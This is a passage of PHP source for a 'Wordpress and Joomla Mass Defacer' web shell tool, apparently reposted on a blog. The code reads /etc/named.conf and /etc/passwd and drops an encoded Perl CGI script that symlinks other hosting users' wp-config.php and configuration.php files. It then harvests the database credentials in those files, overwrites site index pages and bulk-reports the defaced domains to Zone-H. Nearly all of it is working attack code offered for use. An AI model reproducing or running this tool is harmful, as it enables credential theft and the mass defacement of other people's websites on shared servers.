B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
mkdir('plsym',0777);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('/<a href="(.+)">/', $data, $match);
unset($match[1][0]);
$i = 1;
foreach($match[1] as $m)
{
$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
}
if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
}
$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
}
echo '</table>';
echo '<hr/>';
echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
if($count1+$count2 > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
function exec_mode_3($def_url) {
$domains = @file_get_contents("/etc/named.conf");
@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);
$out = array_unique($out[1]);
$num = count($out);
print("Total domains: $num<br><br />");
$def = file_get_contents($def_url);
$def = urlencode($def);
$output = fopen('defaced.html', 'a+');
$defaced = '';
$count1 = 0;
$count2 = 0;
echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';
$j = 1;
$map = array();
foreach($out as $d) {
$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));
$map[$info['name']] = $d;
}
$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';
mkdir('plsym',0777);
file_put_contents('plsym/data.txt', $_POST['man_data']);
file_put_contents('plsym/plsym.cc', base64_decode($dt));
chmod('plsym/plsym.cc', 0755);
$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";
$fp = @fopen ('plsym/.htaccess','w');
fwrite($fp, $wr);
fclose($fp);
$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc');
$url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';
unlink('plsym/plsym.cc');
$data = file_get_contents($url);
preg_match_all('/<a href="(.+)">/', $data, $match);
unset($match[1][0]);
$i=1;
foreach($match[1] as $m)
{
$mz = explode('##',urldecode($m));
$config01 = '';
$config02 = '';
if($mz[1] == 'joomla.txt') {
$config01 = file_get_contents($url.$m);
}
if($mz[1] == 'wordpress.txt') {
$config02 = file_get_contents($url.$m);
}
$domain = $map[$mz[0]];
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($config01 && preg_match('/dbprefix/i',$config01)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="pink">JOOMLA</font></td>';
$res = index_changer_joomla($config01, $def, $domain);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count1++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
if($config02 && preg_match('/DB_NAME/i',$config02)){
echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';
echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';
$res = index_changer_wp($config02, $def);
echo '<td>'.$res['output'].'</td>';
if($res['cond']) {
echo '<td align="center"><span class="green">DEFACED</span></td>';
fwrite($output, 'http://'.$domain."<br>");
$count2++;
} else {
echo '<td align="center"><span class="red">FAILED</span></td>';
}
echo '</tr>';
}
}
echo '</table>';
echo '<hr/>';
echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';
echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';
if($count1+$count2 > 0){
echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';
}
}
function submit_zone_h($hacker) {
$items = explode("<br>", trim(str_replace("\n",'',file_get_contents('defaced.html'))));
unset($items[sizeof($items)-1]);
$items = array_unique(str_replace('http://','',$items));
$total = count($items);
echo '<h3 style="text-align: center;">Checking Defaced sites</h3>';
echo "Total unique domain: $total<br /><br />";
echo '<table style="width:50%;">';
echo '<tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>DID</th><th>Domain</th><th>Status</th></tr>';
$j = 1;
$dc = 0;
$sites = array();
$prob_s = array();
foreach($items as $s) {
$data = file_get_contents('http://'.$s);
$cond = strpos($data, 'hacked');
$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';
if($cond !== false){
echo '<tr '.$cls.'><td>'.$j.'</td><td>'.($dc+1).'</td><td><a href="http://'.$s.'" target="_blank">'.$s.'</a></td><td><span class="green">DEFACED</span></td></tr>';
$sites[] = $s;
$dc++;
} else {
echo '<tr '.$cls.'><td>'.$j.'</td><td> </td><td><a href="http://'.$s.'" target="_blank">'.$s.'</a></td><td><span class="red">NOT DEFACED</span></td></tr>';
$prob_s[] = $s;
}
$j++;
}
echo '</table><br />';
file_put_contents('org_def.html','http://'.implode('<br/>http://',$sites));
file_put_contents('fail_def.html','http://'.implode('<br/>http://',$prob_s));
$total = $dc;
echo '<h3 style="text-align: center;">Total Defaced = '.$total.'</h3>';
echo '<h3 style="text-align: center;"><a href="org_def.html" target="_blank">Originaly Defaced Sites List</a> | <a href="fail_def.html" target="_blank">Failed Defaced Sites List</a></h3><br />';
echo '<h3 style="text-align: center;">Submitting to Zone-H</h3>';
echo '<table style="width:50%;">';
$main=curl_multi_init();
$pause=10;
for($m=0;$m<3;$m++) { $http[] = curl_init(); }
for($n=0;$n<$total;$n +=30) {
for($x=0;$x<30;$x++) {
if($sites[$n+$x]!='') {
echo'<tr class="even"><td>'.rtrim($sites[$n+$x]).'</td><td>DONE!!!</td></tr>';
}
}
$d=$n+30;
if($d>$total){$d=$total;}
echo '<tr class="odd"><td colspan="2" style="text-align:center;">'.$d.' of '.$total.' Done</td></tr>';
for($w=0;$w<3;$w++) {
$p=$w * 10;
if(!(isset($sites[$n+$p]))){$pause=$w;break;}
$posts[$w]="defacer=".$hacker."&domain1=http%3A%2F%2F".rtrim($sites[$n+$p])."&domain2=http%3A%2F%2F".rtrim($sites[$n+$p+1])."&domain3=http%3A%2F%2F".rtrim($sites[$n+$p+2])."&domain4=http%3A%2F%2F".rtrim($sites[$n+$p+3])."&domain5=http%3A%2F%2F".rtrim($sites[$n+$p+4])."&domain6=http%3A%2F%2F".rtrim($sites[$n+$p+5])."&domain7=http%3A%2F%2F".rtrim($sites[$n+$p+6])."&domain8=http%3A%2F%2F".rtrim($sites[$n+$p+7])."&domain9=http%3A%2F%2F".rtrim($sites[$n+$p+8])."&domain10=http%3A%2F%2F".rtrim($sites[$n+$p+9])."&hackmode=14&reason=5&submit=Send";
$curlopt=array(CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',CURLOPT_RETURNTRANSFER => true,CURLOPT_FOLLOWLOCATION =>true,CURLOPT_POST => true, CURLOPT_URL => 'http://www.zone-h.com/notify/mass',CURLOPT_POSTFIELDS => $posts[$w]);
curl_setopt_array($http[$w],$curlopt);
curl_multi_add_handle($main,$http[$w]);
}
$running = null;
do{
curl_multi_exec($main,$running);
} while($running > 0);
for($m=0;$m<3;$m++) {
if($pause==$m){break;}
curl_multi_remove_handle($main, $http[$m]);
$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
if ($code != 200) {
while(true){
echo'<tr class="odd"><td colspan="2" style="text-align:center;">Server Error Retrying...</td></tr>';
sleep(5);
curl_exec($http[$m]);
$code = curl_getinfo($http[$m], CURLINFO_HTTP_CODE);
if( $code== 200){break 1;}
}
}
}
}
echo '<tr class="odd"><td colspan="2" style="text-align:center;">Finished!!</td></tr></table>';
echo '<h3 style="text-align: center;"><a href="org_def.html" target="_blank">Originaly Defaced Sites List</a> | <a href="fail_def.html" target="_blank">Failed Defaced Sites List</a></h3><br />';
curl_multi_close($main);
}
echo '<!DOCTYPE html>
<html>
<head>
<title>Joomla ~ Wordpress Mass Defacer</title>
<link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
<style type="text/css">
table,body {
background:
url("https://d33ds.co/img/bg3.png") repeat ,
url("https://d33ds.co/img/bglight.png") no-repeat center top,top left,top right,
url("https://d33ds.co/img/bg2.png") repeat top left;
background-color: #ffffff;
color:white;
font-family: "Trebuchet MS",Arial;background-attachment:fixed;margin:0;padding:0;}
.header {position:fixed;width:100%;top:0;background:#000;}
.footer {position:fixed;width:100%;bottom:0;background:#000;}
input[type="submit"]{background-color:rgba(25,25,25,0.6);border:1; padding:2px; border-bottom:2px solid white; font-size:25px;font-family:orbitron; color:red;border:2px solid white;margin:4px 4px 8px 0;}
input[type="submit"]:hover{color:SeaShell;}
input[type="text"]:hover{color:SeaShell;}
input[type="radio"]{margin-top: 0;}
.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}
input[type="text"] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:orbitron; font-size:25px; color:#ffffff;border:2px solid #4C83AF;margin:4px 4px 8px 0;}
.even {background-color: rgba(25, 25, 25, 0.6);}
.odd {background-color: rgba(102, 102, 102, 0.6);}
a {color:#fff;} a:hover {color:#00BFFF;}
fieldset{border: 1px solid grey; background: rgba(0,0,0,0.7); width: 600px; margin: 0 auto;min-height:240px;}
textarea{background: rgba(0,0,0,0.6); color: white;}
.green {color:#00FF00;font-weight:bold;}
.red {color:#FF0000;font-weight:bold;}
.killme {position: fixed; top: 20px; right: 20px; border: 2px solid yellow; padding: 10px; font-size: 20px; color: red; font-weight: bold;}
</style>
<script type="text/javascript">
function change() {
if(document.getElementById(\'rcd\').checked == true) {
document.getElementById(\'tra\').style.display = \'\';
} else {
document.getElementById(\'tra\').style.display = \'none\';
}
}
function hide() {
document.getElementById(\'tra\').style.display = \'none\';
}
</script>
</head>
<body>
<div class="footer">
<h3 style="text-align: center;">© K2ll33d <a href="http://facebook.com/k2ll33d" target="_blank"><img src="https://fbstatic-a.akamaihd.net/rsrc.php/yP/r/Ivn-CVe5TGK.ico" width=30></a></h3>
</div>
<h2 style="color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';
if(!isset($_POST['form_action']) && !isset($_GET['zh']) && !isset($_GET['mode']) && !isset($_GET['kill'])){
echo '<div align="center">
<form action="" method="post">
<table>
<tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr>
<tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr>
<tr id="tra" style="display: none;"><td></td><td><textarea cols="40" rows="5" name="man_data"></textarea></td></tr>
</table>
<br />
<input type="hidden" name="form_action" value="1">
<table>
<tr><td><b>index url: </b><input size="35" type="text" name="defpage" value=""></tr></td>
<tr><td><b>Defacer : </b></b><input size="35" type="text" name="defacer" value="Joker Dark Knight"></tr></td>
</table>
<input class=submit type="submit" value="Attack !" name="Submit">
</form>';
}
$milaf_el_index = $_POST['defpage'];
$hacker = $_POST['defacer'];
if($_POST['form_action'] == 1) {
if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }
if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }
if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }
}
if(isset($_GET['zh']) && $_GET['zh']==1) { submit_zone_h($hacker); }
if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }
echo '</body>
</html>';
[PHP] Priv8 Wordpress& Joomla Mass Defacer
![]()
Reviewed by Nguyen Nam Hong
on
10:41 AM
Rating:
